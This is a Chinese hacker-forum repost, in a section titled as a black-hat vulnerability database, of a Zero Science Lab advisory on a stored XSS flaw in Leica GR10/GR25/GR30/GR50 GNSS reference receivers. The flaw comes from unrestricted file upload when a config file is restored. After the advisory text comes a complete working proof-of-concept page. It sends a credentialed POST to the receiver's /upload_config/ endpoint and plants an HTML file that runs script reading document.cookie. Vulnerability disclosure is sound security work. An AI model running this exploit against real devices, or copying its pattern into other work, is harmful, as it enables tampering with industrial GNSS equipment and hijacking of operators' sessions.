跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
<--

Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection


Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063
                  4.20.232
                  4.11.606
                  3.22.1818
                  3.10.1633
                  2.62.782
                  1.00.395

Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and
performance.

Desc: The application suffers from a stored XSS vulnerability. The issue is
triggered via unrestricted file upload while restoring a config file allowing
the attacker to upload an html or javascript file that will be stored in
/settings/poc.html. This can be exploited to execute arbitrary HTML or JS
code in a user's browser session in context of an affected site.

Tested on: BarracudaServer.com (WindowsCE)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5503
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php

Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php


18.12.2018

-->


<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.1.17\/upload_config\/", true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryKW8wlraBygxiEQyo");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryKW8wlraBygxiEQyo\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"xss.html\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\n" + 
          "\x3chtml\x3e\r\n" + 
          "\x3chead\x3e\r\n" + 
          "\x3ctitle\x3eHTMLi\x3c/title\x3e\r\n" + 
          "\x3c/head\x3e\r\n" + 
          "\x3cbody\x3e\r\n" + 
          "\x3cscript\x3econfirm(document.cookie)\x3c/script\x3e\r\n" + 
          "\x3c/body\x3e\r\n" + 
          "\x3c/html\x3e\n" + 
          "\n" + 
          "\r\n" + 
          "------WebKitFormBoundaryKW8wlraBygxiEQyo--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Init" onclick="submitRequest();" />
    </form>
  </body>
</html>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。